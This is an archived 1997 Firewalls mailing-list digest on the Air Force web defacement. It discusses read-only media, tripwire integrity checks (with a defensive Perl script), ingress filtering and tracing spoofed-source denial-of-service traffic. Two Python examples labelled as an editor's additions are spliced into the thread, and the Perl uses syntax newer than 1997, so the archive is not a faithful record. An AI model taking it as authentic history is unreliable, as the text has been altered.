From firewalls-owner Wed Jan 1 06:13:58 1997
Date: Wed, 1 Jan 1997 15:02:34 +0100 (MET)
From: Thomas Leitner
To: Chris Plunkett
Cc: firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
In-Reply-To: <32C9B1A6.2B5F@opensys.com>

On Tue, 31 Dec 1996, Chris Plunkett wrote:

> > Slackware Linux has a useable filesystem on CD-ROM, however the boot
> > partition still has to be HD or Floppy. One thing that puzzles me about
> > bootable media is if you have a bootable CD, how does it install the
> > drivers for itself to read from the CD to actually start reading the boot
> > sector (which supposedly is on the CD). Kind of a Catch-22. Forgive me, but
> > I'm no PC guru...
>
> Or, you could get a SUN and type boot cd.

As far as I know, this does *not* run with a RO filesystem. It rather
creates an in-memory writeable root filesystem (ramdisk in PC-speak).

Tom

--------------------------------------------------------------------------
T o m   L e i t n e r                       Dept. of Communications
                                            Graz University of Technology,
e-mail : tom@finwds01.tu-graz.ac.at         Inffeldgasse 12
Phone  : +43-316-873-7455                   A-8010 Graz / Austria / Europe
Fax    : +43-316-463-697
Home page : http://wiis.tu-graz.ac.at/people/tom.html
PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send
mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net
--------------------------------------------------------------------------

From firewalls-owner Wed Jan 1 06:28:51 1997
Date: Wed, 1 Jan 1997 14:59:49 +0100 (MET)
From: Thomas Leitner
To: Paul Ferguson
Cc: Mark Johnson, Gene Lee, Dale Drew, Michael Idengren, Christopher Klaus,
    firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
In-Reply-To: <3.0.32.19961231180249.006b8f24@lint.cisco.com>

On Tue, 31 Dec 1996, Paul Ferguson wrote:

> Frankly, I think the suggestion of using non-writable media (ie. CD-ROMs)
> is rather unpractical. Most sufficiently interesting web sites contain
> ever-changing & constantly updated information, such as news, various
> daily features, etc.
>
> Not a practical solution.

O.K. If you want to be really secure and still updateable, do this:

1.) Use two mirrored disks. One is mounted read-only, one is mounted
    read/write. The two disks can contain not only the WEB data but the
    whole operating system as well. As someone already noted before:
    Linux (and I'm sure other Unixes as well) can be set up to run from
    RO media.

2.) When updates are required: mount the second mirror disk r/w, do the
    update and reboot from the second mirror disk, which is now mounted
    read-only. If the system is set up properly, the reboot time and thus
    the outage time can be kept quite low.

3.) When the system comes up, mount the first disk RW and apply the
    updates as well to keep the disk contents in sync.

If the outage during the update is unacceptable, what about using two
mirror machines: one standby and RW for updates and one on-line running
RO. After the update, machines could swap their functions immediately.
Sure: this would require some fancy IP address setup.

Tom

--------------------------------------------------------------------------
T o m   L e i t n e r                       Dept. of Communications
                                            Graz University of Technology,
e-mail : tom@finwds01.tu-graz.ac.at         Inffeldgasse 12
Phone  : +43-316-873-7455                   A-8010 Graz / Austria / Europe
Fax    : +43-316-463-697
Home page : http://wiis.tu-graz.ac.at/people/tom.html
PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send
mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net
--------------------------------------------------------------------------

From firewalls-owner Wed Jan 1 06:43:54 1997
Date: Wed, 01 Jan 1997 09:35:47 -0500
From: The Unseen
To: Brad Daugherty
cc: Mark Johnson, Dale Drew, Michael Idengren, Christopher Klaus,
    firewalls@GreatCircle.COM
Subject: Re: WWW Gaffiti Immunity (Off Topic)
In-reply-to: Your message of "Tue, 31 Dec 1996 14:57:19 PST."
             <3.0.32.19961231145712.00a49df8@lexicon.ins.com>
Message-Id: <199701011435.JAA01074@sparc.south-border.com>

In message <3.0.32.19961231145712.00a49df8@lexicon.ins.com>, Brad Daugherty
slapped a few random keys to produce:

>>> I don't see how CDROM provides significant advantages on a WEB server
>>> "graffiti" attack.
> >In order to avoid graffiti try something like this:
> >
> >1)Write a program that checks the size/date of the WWW directory
> >  If it fails have it Kill the WWW server
> >  and send email to the admin.
> >2)Setup a CRON job to run the program every 15 min.
> >
> >If a hacker is good enough they will find it, but who would be looking for
> >such a random thing?
> >
> >Just make sure you change the size whenever you make a change to your
> >documents.

Or better yet, incorporate tripwire with MD5 file signatures into this
scheme instead of rolling your own. Use perl to scan for particular files
that may have changed, taking guestbooks' "public" growable files into
account.

Some ideas,

Ian

From firewalls-owner Wed Jan 1 06:58:53 1997
Date: Wed, 01 Jan 1997 16:45:28 +0200
From: Can Baysal
Organization: Bogazici University Computer Center
To: firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
Message-Id: <32CA7888.477CA5C1@boun.edu.tr>

Thomas Leitner wrote:
>
> ................
> If the outage during the update is unacceptable what about using
> two mirror machines: One standby and RW for updates and one
> on-line running RO. After the update, machines could swap their
> functions immediately. Sure: This would require some fancy IP
> address setup.
Well, assuming that one has enough funds, IBM's HACMP can be installed
(onto IBM systems :). So there should not be a problem while configuring
IP (and this is not the only benefit). IMHO it is not so good for
installations that have so many users (especially if you want to keep
them online while switching), like our 10000+, but very suitable if you
want to back your data servers up (like ftp and http).

Regards;

Can Baysal

>
> Tom
>
> --------------------------------------------------------------------------
> T o m   L e i t n e r                       Dept. of Communications
>                                             Graz University of Technology,
> e-mail : tom@finwds01.tu-graz.ac.at         Inffeldgasse 12
> Phone  : +43-316-873-7455                   A-8010 Graz / Austria / Europe
> Fax    : +43-316-463-697
> Home page : http://wiis.tu-graz.ac.at/people/tom.html
> PGP public key on : ftp://wiis.tu-graz.ac.at/pgp-keys/tom.asc or send
> mail with subject "get Thomas Leitner" to pgp-public-keys@keys.pgp.net
> --------------------------------------------------------------------------

From firewalls-owner Wed Jan 1 07:14:06 1997
Date: Wed, 1 Jan 1997 10:02:51 -0500 (EST)
From: FaNgYoU2
To: firewalls@GreatCircle.com
Subject: Re: LDAP
In-Reply-To: <199701010454.XAA02712@mail.clark.net>

> >Any of you hot shot vendors ...
> > ... doing any work to include
> >LDAP enterprise directory access in firewalls?
>
> V-one is doing some stuff with LDAP ...
What I had in mind was to try to get an idea of what would be involved in
a migration strategy to move from fragmented directory services on
different platforms to an enterprise directory that included firewalls as
follows:

Banyan Vines    }  LDAP
Novell Netware  }  access                  Packet        Proxy   Choke
Lotus Notes     }--enterprise--|--filtering--fire--filtering--|--Internet
Assorted Unix's }  directory   |  router     wall    router   |
Windows NT      }              |                              |
                               |             Packet           External
                               |             filtering        hardened
                               |             router           DNS server
                               |               |
                               |             Packet filtering--Corporate
                               |             firewall          Intranet

This is essentially a split DNS to hide the corporate network. The
external DNS would provide minimal DNS information on a skeletonized Unix
box, while the internal LDAP access enterprise directory would provide
directory information for everything.

From firewalls-owner Wed Jan 1 10:46:45 1997
Date: Wed, 1 Jan 1997 13:37:00 -0500 (EST)
From: Michael Idengren
To: Paul Ferguson
cc: Mark Johnson, firewalls@GreatCircle.COM
Subject: Re: Denial of service (was Re: Air Force Web Site Hacked)
In-Reply-To: <3.0.32.19961231222828.006b99dc@lint.cisco.com>

> the world, but a simple-minded denial-of-service attack makes it
> almost an effort in futility if connectivity is your lifeblood.

Speaking of denial-of-service attacks, how would one go about tracing
packets with a false IP header?
The dilemma here is that we have got our router configured properly so
that it doesn't let any packets leave our network with false headers. But
there's a whole slew of people out there with routers who either don't
care or don't know how to filter bad outgoing packets. This presents a
big problem for us if someone decides to execute a denial of service on
us, or even do a simple IP spoof in a hacking attempt so we can't trace
them.

Any Suggestions?

Mike Idengren                    | MEISTER
---------------------------------+----------------------------------
Center for Information Technology| Alachua Free-Net IRC Administrator
Stetson University               | WorldWide Free-Net IRC Network Coordinator

From firewalls-owner Wed Jan 1 10:59:01 1997
Date: Wed, 1 Jan 1997 13:43:01 -0500 (EST)
From: Michael Idengren
To: Norm Laudermilch
cc: firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked

> I do think read-only media is an interesting idea, by the way :) Dale is
> right though, there are still vulnerabilities. Personally, I like the idea
> of marking the files immutable myself. This way, even root can't change the
> content unless the machine is brought down into single-user mode. Not sure
> how many other operating systems support this other than (the great) BSDI
> though.

I just have a couple of points to bring up on this thread:

1. My comment was partially meant as a joke, it's horribly impractical
   for ISP's and Universities and such to require operator intervention
   every time a webpage needs to be updated. Such a level of paranoia
   *might* only be appropriate for government agencies and authoritative
   advanced research sites.

2. With regards to marking files immutable: if I really wanted to secure
   a file, I wouldn't do it with software security. No way no how
   absolutely not - this is the whole point, hardware-level security is
   the entire point behind R/O media. I myself would only feel comfortable
   with jumpering the hard drive as read-only or mounting a CD-ROM if I
   ever had to go to such a level of paranoia.

Mike Idengren                    | MEISTER
---------------------------------+----------------------------------
Center for Information Technology| Alachua Free-Net IRC Administrator
Stetson University               | WorldWide Free-Net IRC Network Coordinator

From firewalls-owner Wed Jan 1 11:10:50 1997
Date: Wed, 01 Jan 1997 13:36:59 -0500
To: Firewalls Mailing List
From: Paul Ferguson
Subject: Edupage excerpt
Message-Id: <3.0.32.19970101133656.006c28e4@lint.cisco.com>

FYI.
- paul

[snip]

>Date: Tue, 31 Dec 1996 15:29:42 -0500 (EST)
>From: Edupage Editors
>Subject: Edupage, 31 December 1996

[snip]

>
>AIR FORCE WEB PAGE HACKED INTO BY VANDALS
>The U.S. Air Force's home page on the World Wide Web < http://www.af.mil >
>was broken into Monday afternoon and replaced with a pornographic image,
>obscenities, and anti-government tirades. Identifying himself only as a
>23-year-old San Diego "business man," the individual who claimed
>responsibility for the invasion told a reporter by telephone: "This was a
>complete server takeover. We literally could have dismantled all the
>electronic information, including e-mail." The man said that he and the
>individuals who participated with him in the vandalism "didn't do any
>damage," and claimed that, "We did it simply to show them you've got to
>upgrade security. The security is simply pathetic on government systems,
>and it's not stopping anyone. One of the people involved in the actual
>break-in was only 15. A foreign government could go through that security
>in a few minutes." He gave himself only 50-50 odds of not being caught, and
>predicted: "The government is going to treat this very, very seriously.
>The illegality of this is extreme." The Air Force Office of Special
>Investigations and the Federal Bureau of Investigations are investigating
>the break-in. (New York Times 31 Dec 96 A9)
>

[snip]

--
Paul Ferguson                       ||        ||
Consulting Engineering              ||        ||
Herndon, Virginia USA              ||||      ||||
tel: +1.703.397.5938           ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com      c i s c o S y s t e m s

From firewalls-owner Wed Jan 1 11:14:27 1997
Date: Wed, 01 Jan 1997 14:03:03 -0500
From: The Unseen
To: firewalls@GreatCircle.COM
cc: Brad Daugherty, Mark Johnson, Dale Drew, Michael Idengren,
    Christopher Klaus
Subject: Re: WWW Gaffiti Immunity (Off Topic)
In-reply-to: Your message of "Wed, 01 Jan 1997 09:35:47 EST."
             <199701011435.JAA01074@sparc.south-border.com>
Message-Id: <199701011903.OAA02003@sparc.south-border.com>

In message <199701011435.JAA01074@sparc.south-border.com>, The Unseen
slapped a few random keys to produce:

>In message <3.0.32.19961231145712.00a49df8@lexicon.ins.com>,
>Brad Daugherty slapped a few random keys to produce:
>>>> I don't see how CDROM provides significant advantages on a WEB server
>>>> "graffiti" attack.
>>
>>In order to avoid graffiti try something like this:
>>
>>1)Write a program that checks the size/date of the WWW directory
>>  If it fails have it Kill the WWW server
>>  and send email to the admin.
>>2)Setup a CRON job to run the program every 15 min.
>>
>>If a hacker is good enough they will find it, but who would be looking for
>>such a random thing?
>>
>>Just make sure you change the size whenever you make a change to your
>>documents.
>
>Or better yet, incorporate tripwire with MD5 file signatures into this
>scheme instead of rolling your own. Use perl to scan for particular files
>that may have changed, taking guestbooks' "public" growable files into
>account.
>
>Ian

Unusual for me to answer my own E-mail... 8-)

Here's my donation... (no flames please)

Please keep in mind that I just created this off the top of my head. You
are more than welcome to alter/tailor to your needs...

Ian

-------
#!/usr/local/bin/perl
#
# The purpose of this script is to help secure our WWW files
# from graffiti. We are going to use tripwire to help us keep
# track of file signatures and alert us when there are major
# inconsistencies that may result from someone trying to hack
# our site.
#
# Ideal config consists of a WWW server mounting via NFS the
# document tree. This script is intended to be run on the
# NFS server.
#
# Feel free to distribute and/or alter this script as needed.
# But be kind and email me the changes... ian@south-border.com

package WWWcheck;
use strict;
use warnings;

# Lines of the tripwire report; empty means nothing changed.
our @SendData = ();

# Specify the email address of the admin you want information
# mailed to.
our $AdminUser = "securityuser";

# Specify the method of emailing (sendmail -t takes the
# recipients from the headers we print).
our $SendmailCMD = "/usr/lib/sendmail -t";

# The following variables define where tripwire is. Specify
# the correct database and config files to be given to tripwire
# as options. Tripwire will run in quiet mode to eliminate
# pass babble.
our $TripCMD        = "/place/to/bin/tripwire";
our $TripDatabase   = "/place/to/tripwire/www.database";
our $TripConfigFile = "/place/to/tripwire/WWW.conf";

# If your WWW server mounts its document tree via NFS from
# a hardened server and this script and tripwire run on the
# NFS server, set DoNFSshare to 1. This will unshare the NFS
# directory after a grace period defined below.
our $DoNFSshare    = 1;
our $NFSunsharecmd = "/usr/sbin/unshare";
our $NFSwwwdir     = "/place/to/real/NFS/server/WWW";

# Change this to 1 to kill the httpd server remotely based on
# the outcome of tripwire. Be sure to review RemoteHttpKill,
# RemoteHost, and RemoteCMD. I like ssh because of the key
# exchange.
our $DoRemoteKill = 1;

# These are used when DoRemoteKill is set to 1
our $RemoteCMD      = "/opt/PUBsshd/bin/ssh";
our $RemoteHost     = "WWW";
our $RemoteHttpKill = "/etc/init.d/httpd stop";

# This defines how long (in seconds) to wait gracefully before
# proceeding with killing the httpd server and NFS server.
our $GraceSeconds = 3600;

#<----you do not need to change anything below here--->

# Issue tripwire command with options. Compile a list of
# changes that have occurred from the last update of the
# tripwire database. Save these modifications to be sent
# as a notification to the admin.
sub BuildTripDatabase {
    # List-form open: no shell is involved in running tripwire.
    open(my $trip, "-|", $TripCMD, "-d", $TripDatabase,
         "-c", $TripConfigFile, "-q")
        or die "cannot run $TripCMD: $!";
    while (<$trip>) {
        chomp;
        push(@SendData, $_);
    }
    close($trip);
}

# The actions the options call for, as argument lists: printed
# in the alert mail and later handed to system() unchanged.
sub PlannedActions {
    my @actions;
    push(@actions, [$NFSunsharecmd, $NFSwwwdir])               if $DoNFSshare   == 1;
    push(@actions, [$RemoteCMD, $RemoteHost, $RemoteHttpKill]) if $DoRemoteKill == 1;
    return @actions;
}

sub AlertAdmin {
    return unless @SendData;    # nothing changed, nothing to report
    my @actions = PlannedActions();
    open(my $alert, "|-", $SendmailCMD) or die "cannot run $SendmailCMD: $!";
    print $alert "To: $AdminUser\n";
    print $alert "Subject: WWW server Document tree has changed\n";
    print $alert "\n";          # blank line separates headers from body
    print $alert "The WWW document tree has changed since the last tripwire\n";
    print $alert "database update. Here is a summary of the output from\n";
    print $alert "tripwire, run at ", scalar(localtime), ":\n\n";
    print $alert "$_\n" for @SendData;
    print $alert "\nThe following actions will be taken...\n\n";
    if (@actions) {
        print $alert "After a grace period of $GraceSeconds seconds the\n";
        print $alert "following commands will be issued:\n\n";
        print $alert "  @$_\n" for @actions;
    } else {
        print $alert "Although we have detected differences that may indicate an\n";
        print $alert "attack, options set tell us that we are to take no action\n";
        print $alert "in response. YOU MUST CHECK to see if this is really the\n";
        print $alert "intended reaction to the tripwire output!\n";
    }
    close($alert);
}

sub PerformKill {
    return unless @SendData;    # only act when tripwire reported changes
    my @actions = PlannedActions();
    return unless @actions;
    sleep($GraceSeconds);       # give the admin a chance to intervene
    for my $cmd (@actions) {
        system(@$cmd) == 0 or warn "@$cmd failed: $?\n";
    }
}

sub main {
    BuildTripDatabase();
    AlertAdmin();
    PerformKill();
}

package main;
WWWcheck::main();

From firewalls-owner Wed Jan 1 11:43:57 1997
Date: Wed, 01 Jan 1997 14:30:00 -0500
To: Michael Idengren
From: Paul Ferguson
Subject: Re: Denial of service (was Re: Air Force Web Site Hacked)
Cc: Daniel Senie, firewalls@GreatCircle.COM
Message-Id: <3.0.32.19970101142953.0069e384@lint.cisco.com>

At 01:37 PM 1/1/97 -0500, Michael Idengren wrote:
>
>Speaking of denial-of-service attacks, how would one go about tracing
>packets with a false IP header?
>

I assume that you mean spoofed source addresses here when you mention
'false IP headers'. This is a tough problem, and being on the receiving
end of this, there's really not much you can do at this point.
I also assume that what you refer to below as 'we have got our router
configured properly so that it doesn't let any packets leave our network
with false headers' is traffic filtering on ingress to ensure that only
traffic originating from valid downstream prefixes (ones which you are
advertizing upstream) is allowed to traverse the intermediate next hop
(your router), as described in draft-ferguson-ingress-filtering-01.txt.

My coauthor, Daniel Senie [Proteon], and I are going to be submitting an
update to this draft (and perhaps subsequent updates) so that we can get
this moving for publication as an Informational RFC. We're still waiting
to incorporate some additional text & comments into the document on how
it breaks certain technologies (such as mobile IP).

As an aside, there are several discussions surrounding the use of bogus
source addresses in any denial-of-service attack. One such discussion
involves what type of DoS attack we're talking about here; TCP SYN or UDP
flooding. In the case of TCP SYN attacks, one might argue that if the
source address, whether bogus or not, does not exist in the routing
table, then completion of the three-way handshake should not be
negotiated by the receiver. This would appear to be a simple defense. A
more insidious attack method (also mentioned in the draft), however, is
one in which a bogus source address is used by the attacker, but which
is actually a valid, routable, reachable prefix in the routing table,
but which actually belongs to another end-system. The end result is an
exercise for the reader.

Any TCP SYN attack which uses reachable prefixes that are bogus source
addresses of the true originator is a hard problem to solve. There are
several devices which have been recently introduced which proxy the
SYN/ACK between originator & destination host which do not attempt to
complete the three-way handshake after 'x' number of SYN's, however, I
won't mention them by name in this forum. There will probably be
additional features such as this introduced in the near future. Also,
there are several OS vendors which have enhanced the way their particular
operating system handles this type of attack by increasing the
appropriate queue depths & decreasing the appropriate timer values. I
won't reference them either.

In any event (and back to the original question), tracing an attack back
to the true originator is tough, and requires the assistance of network
administrators within each administrative domain the attack traverses on
an autonomous system hop-by-hop basis. If you can trace the attack on a
hop-by-hop basis, gleaning previous hop information, the attacker can be
traced to its true source. In an ideal world, one might expect the
various Internet service providers to cooperate in tracking down the
perpetrator of such an attack; in the Real World (tm), sometimes the
amount of cooperation leaves a lot to be desired. This is not to say,
however, that it cannot be done; in fact, it was successfully done just
recently to track down the perpetrator of such an attack. Prosecuting
them is another issue entirely. ;-)

So, what can you do? Log, log, log. And more logging. And get to know the
security administrator upstream from you.

- paul

>The dilemma here is that we have got our router configured properly so
>that it doesn't let any packets leave our network with false headers. But
>there's a whole slew of people out there with routers who either don't
>care or don't know how to filter bad outgoing packets. This presents a
>big problem for us if someone decides to execute a denial of service on
>us, or even do a simple IP spoof in a hacking attempt so we can't trace
>them.
>
>Any Suggestions?
>
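An added illustration of the ingress filtering Paul Ferguson describes above. This is the editor's code, not code from his message, from the draft, or from any other post in this thread: a toy edge-router filter that forwards only packets whose source address lies in the attached customer's prefixes, plus the three verdicts a victim can reach from a source address alone. The networks, hosts and packets are constructed for the example, using RFC 5737 documentation ranges.

```python
"""Ingress filtering (draft-ferguson-ingress-filtering) in miniature.

Editor's added example, not code from the message above or from the draft.
The provider's router on the customer-facing interface forwards a packet
only if its source address belongs to a prefix the customer legitimately
originates. All prefixes, hosts and packets below are constructed.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    kind: str  # "tcp-syn" or "udp"


class EdgeIngressFilter:
    """Filter applied by the provider router on the customer-facing interface."""

    def __init__(self, customer_prefixes):
        self.prefixes = [ipaddress.ip_network(p) for p in customer_prefixes]

    def permits(self, pkt):
        src = ipaddress.ip_address(pkt.src)
        return any(src in net for net in self.prefixes)

    def apply(self, packets):
        """Split packets into those forwarded upstream and those dropped."""
        forwarded = [p for p in packets if self.permits(p)]
        dropped = [p for p in packets if not self.permits(p)]
        return forwarded, dropped


def victim_view(src, routing_table, own_prefixes):
    """What a receiver can conclude from a packet's source address alone.

    'unroutable': no route back, so the SYN/ACK is never answered and the
    three-way handshake cannot complete (the simple defence in the text).
    'reachable': the prefix exists and belongs to some end-system, so a
    genuine client and a spoofed source look identical here; only the
    filter at the originating edge could have stopped the spoof.
    """
    addr = ipaddress.ip_address(src)
    if any(addr in ipaddress.ip_network(p) for p in own_prefixes):
        return "ours"
    if any(addr in ipaddress.ip_network(p) for p in routing_table):
        return "reachable"
    return "unroutable"


# Constructed topology: the attacker sits in CUSTOMER_NET behind an edge
# router that applies ingress filtering; VICTIM_NET is the target; OTHER_NET
# is an unrelated, legitimately routed network whose addresses the attacker
# borrows as spoofed sources.
CUSTOMER_NET = "203.0.113.0/24"
VICTIM_NET = "192.0.2.0/24"
OTHER_NET = "198.51.100.0/24"
ROUTING_TABLE = [CUSTOMER_NET, VICTIM_NET, OTHER_NET]

SAMPLE_PACKETS = [
    Packet("203.0.113.7", "192.0.2.80", "tcp-syn"),    # genuine customer host
    Packet("10.9.8.7", "192.0.2.80", "tcp-syn"),       # bogus, unroutable source
    Packet("198.51.100.42", "192.0.2.80", "tcp-syn"),  # spoofed, but a real prefix
    Packet("198.51.100.43", "192.0.2.53", "udp"),      # spoofed UDP flood packet
]


def run_demo():
    """Run the sample packets through the edge filter and the victim's view."""
    edge = EdgeIngressFilter([CUSTOMER_NET])
    forwarded, dropped = edge.apply(SAMPLE_PACKETS)
    # Without the edge filter every packet would reach the victim; this is
    # all the victim could tell about each source.
    seen_by_victim = {p.src: victim_view(p.src, ROUTING_TABLE, [VICTIM_NET])
                      for p in SAMPLE_PACKETS}
    return forwarded, dropped, seen_by_victim


if __name__ == "__main__":
    fwd, drp, view = run_demo()
    print("forwarded by edge:", [p.src for p in fwd])
    print("dropped by edge:  ", [p.src for p in drp])
    for src, verdict in view.items():
        print(f"victim sees {src}: {verdict}")
```

The third and fourth packets are the insidious case in the text: their source is a real, routable prefix that belongs to someone else, so the victim classifies them exactly like the genuine client ("reachable") and a routing-table check buys nothing; only the filter at the attacker's own edge drops them, which is why the draft puts the check there rather than at the target.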
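An added example for the WWW graffiti subthread earlier in this digest (Brad Daugherty's size/date check and Ian's tripwire wrapper). It is the editor's code, not Ian's script and not tripwire itself: it records a manifest of size and SHA-256 per file, re-checks the tree, and lets a file listed as growable (a guestbook) change only by appending, verified by hashing the first recorded-size bytes of the new contents. SHA-256 stands in for the MD5 signatures mentioned in the thread; the document tree, file names and contents are constructed in a temporary directory for the demonstration.

```python
"""Integrity check of a WWW document tree, in the style of the tripwire
scheme proposed in the thread.

Editor's added example, not Ian's script and not tripwire. The document
tree below is constructed in a temporary directory; file names and
contents are invented for the demonstration.
"""
import hashlib
import tempfile
from pathlib import Path


def _digest(data: bytes) -> str:
    # SHA-256 rather than the MD5 signatures mentioned in the thread.
    return hashlib.sha256(data).hexdigest()


def build_manifest(root):
    """Map relative path -> (size, sha256) for every file under root."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            data = path.read_bytes()
            manifest[path.relative_to(root).as_posix()] = (len(data), _digest(data))
    return manifest


def check_tree(root, manifest, growable=frozenset()):
    """Compare the tree against a stored manifest.

    Returns lists of modified, added, removed and legitimately grown files.
    A growable file passes only if its old contents are still an exact
    prefix of the new contents; truncation or rewriting counts as a
    modification, so a defaced guestbook is still caught.
    """
    root = Path(root)
    current = build_manifest(root)
    findings = {"modified": [], "added": [], "removed": [], "grew": []}
    for rel, (old_len, old_hash) in manifest.items():
        if rel not in current:
            findings["removed"].append(rel)
            continue
        new_len, new_hash = current[rel]
        if new_hash == old_hash:
            continue
        if rel in growable and new_len > old_len:
            head = (root / rel).read_bytes()[:old_len]
            if _digest(head) == old_hash:
                findings["grew"].append(rel)
                continue
        findings["modified"].append(rel)
    findings["added"] = [rel for rel in current if rel not in manifest]
    return findings


def is_defaced(findings):
    """Anything but an append to a growable file is grounds to stop httpd."""
    return bool(findings["modified"] or findings["added"] or findings["removed"])


def run_demo():
    """Constructed scenario: a clean guestbook append, then a defacement."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.html").write_text("<h1>Welcome</h1>\n")
        (root / "guestbook.txt").write_text("alice was here\n")
        manifest = build_manifest(root)

        with open(root / "guestbook.txt", "a") as fh:   # legitimate append
            fh.write("bob was here\n")
        after_append = check_tree(root, manifest, growable={"guestbook.txt"})

        (root / "index.html").write_text("<h1>graffiti</h1>\n")  # defaced
        (root / "x.html").write_text("dropped file\n")           # new file
        (root / "guestbook.txt").write_text("erased\n")          # rewritten
        after_attack = check_tree(root, manifest, growable={"guestbook.txt"})
    return after_append, after_attack


if __name__ == "__main__":
    clean, attacked = run_demo()
    print("after append:", clean, "defaced:", is_defaced(clean))
    print("after attack:", attacked, "defaced:", is_defaced(attacked))
```

As with the size/date scheme, the manifest has to be regenerated after every legitimate update, and it must live somewhere the web server cannot write (the hardened NFS server in Ian's layout), otherwise an intruder who can rewrite the pages can rewrite the manifest too.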
From firewalls-owner Wed Jan 1 12:02:52 1997
Date: Wed, 01 Jan 1997 12:55:29 -0600
From: Bertrum Carroll
Organization: Deere & Company
To: Brad Daugherty
Cc: Mark Johnson, Dale Drew, Michael Idengren, Christopher Klaus,
    firewalls@GreatCircle.COM
Subject: Re: WWW Gaffiti Immunity (Off Topic)
References: <3.0.32.19961231145712.00a49df8@lexicon.ins.com>
Message-Id: <32CAB321.2EBC@90.deere.com>

Brad,

I agree with you, but it looks like you just described "TripWire"?

What OS & Webserver does the Air Force use?

Brad Daugherty wrote:
>
> >> I don't see how CDROM provides significant advantages on a WEB server
> >> "graffiti" attack.
>
> In order to avoid graffiti try something like this:
>
> 1)Write a program that checks the size/date of the WWW directory
>   If it fails have it Kill the WWW server
>   and send email to the admin.
> 2)Setup a CRON job to run the program every 15 min.
>
> If a hacker is good enough they will find it, but who would be looking for
> such a random thing?
>
> Just make sure you change the size whenever you make a change to your
> documents.
>
> As for CD-ROM WWW sites, I believe the term "Link-rot" comes to mind.
>
> Good Luck,
> Brad
>
> Providing The Power Of Operable Networks
> Brad Daugherty - Associate Network Systems Engineer
> PHONE:(630)942-5770 PAGE:(800)467-1467 FAX:(630)545-0068
> Lifetime:

From firewalls-owner Wed Jan 1 12:29:17 1997
Date: Wed, 01 Jan 1997 12:24:42 -0800
From: Mark Johnson
To: Michael Idengren
CC: Norm Laudermilch, firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
Message-ID: <32CAC80A.562C@hercules.reno.nv.us>

Michael Idengren wrote:
> 1. My comment was partially meant as a joke, it's horribly impractical
> for ISP's and Universities and such to require operator intervention
> every time a webpage needs to be updated. Such a level of paranoia
> *might* only be appropriate for government agencies and authoritative
> advanced research sites.
>
> 2. With regards to marking files immutable: If I really wanted to secure
> a file, I wouldn't do it with software security. No way no how absolutely
> not - this is the whole point, hardware-level security is the entire point
> behind R/O media. I myself would only feel comfortable with jumpering the
> hard drive as read-only or mounting a CD-ROM if I ever had to go to such a
> level of paranoia.
>
> Mike Idengren                    | MEISTER
> ---------------------------------+----------------------------------
> Center for Information Technology| Alachua Free-Net IRC Administrator
> Stetson University               | WorldWide Free-Net IRC Network Coordinator
>

I agree that CDROM may not be the best R/O media. A R/O hard drive or
some other form of media which has the ability to shut off the write
abilities at the hardware level may be a more cost/time effective means.

However, as far as who should be this paranoid, that's a whole other
issue. I work for a Medical Institution, and the laws that govern patient
confidentiality are a nightmare just to read, much less enforce
electronically. Some Medical Institutions are wanting to put patient info
on line for patient access. So since I live in Reno, a lot of so-called
"mega-stars" may visit the hospital. How much do you think tabloids or
whoever would pay to get the clinical data? Just for verbal information,
doctors have been offered $80,000 (hearsay) for info on one so-called
"mega-star" who was admitted to one of the local hospitals. Same thing
would happen if a government official was admitted. This may seem
extreme, but obviously it's happening more and more. This type of
personal info will become more and more available via the internet. Law
Offices may have their clients' info on the Internet for their clients to
access. This kind of thing becomes quite dangerous for the institutions.

--
Mark Johnson
Network Project Manager
St.
Mary's Regional Med Ctr mark@hercules.reno.nv.us From firewalls-owner Wed Jan 1 12:43:55 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA09193 for firewalls-outgoing; Wed, 1 Jan 1997 12:34:56 -0800 (PST) Received: from pagesz.net (nina.pagesz.net [208.194.157.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA09176 for ; Wed, 1 Jan 1997 12:34:44 -0800 (PST) Received: from jtruitt.pagesz.net (henryIV-82.pagesz.net [208.194.157.82]) by pagesz.net (8.8.2/8.7.3) with SMTP id PAA26231; Wed, 1 Jan 1997 15:34:00 -0500 Message-Id: <199701012034.PAA26231@pagesz.net> X-Sender: jtruitt@mailhost.pagesz.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 01 Jan 1997 15:32:28 -0500 To: Paul Ferguson From: Jim Truitt Subject: Re: Denial of service (was Re: Air Force Web Site Hacked) Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [snip] >So, what can you do? Log, log, log. And more logging. And get >to know the security administrator upstream from you. > >- paul [snip] This is simple, but excellent advice. Users of PGP are always talking about a "web of trust". Perhaps what is needed is a web of trust between security admins. Just a thought. 
